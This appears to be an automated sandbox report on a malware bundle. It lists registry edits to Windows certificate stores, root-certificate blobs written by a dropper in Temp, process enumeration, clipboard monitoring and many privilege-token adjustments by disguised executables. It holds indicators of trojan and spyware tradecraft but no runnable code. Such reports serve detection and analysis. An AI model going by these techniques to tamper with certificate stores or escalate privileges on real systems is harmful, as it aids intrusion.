Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\sihclient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\sihclient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\sihclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\sihclient.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7BH5.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7BH5.tmp\setup_2.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\3313646.exe N/A
N/A N/A C:\ProgramData\3313646.exe N/A
N/A N/A C:\ProgramData\4390821.exe N/A
N/A N/A C:\ProgramData\4390821.exe N/A
N/A N/A C:\ProgramData\6546358.exe N/A
N/A N/A C:\ProgramData\6546358.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\ProgramData\8148614.exe N/A
N/A N/A C:\ProgramData\8148614.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CFA31.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CFA31.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\ProgramData\6069887.exe N/A
N/A N/A C:\ProgramData\6069887.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\4877252.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19f84b58b3d7.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat191649b47c9e2.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\4390821.exe N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\6069887.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\3313646.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\6546358.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\8148614.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-8TFS5.tmp\46807GHF____.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\6069887.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
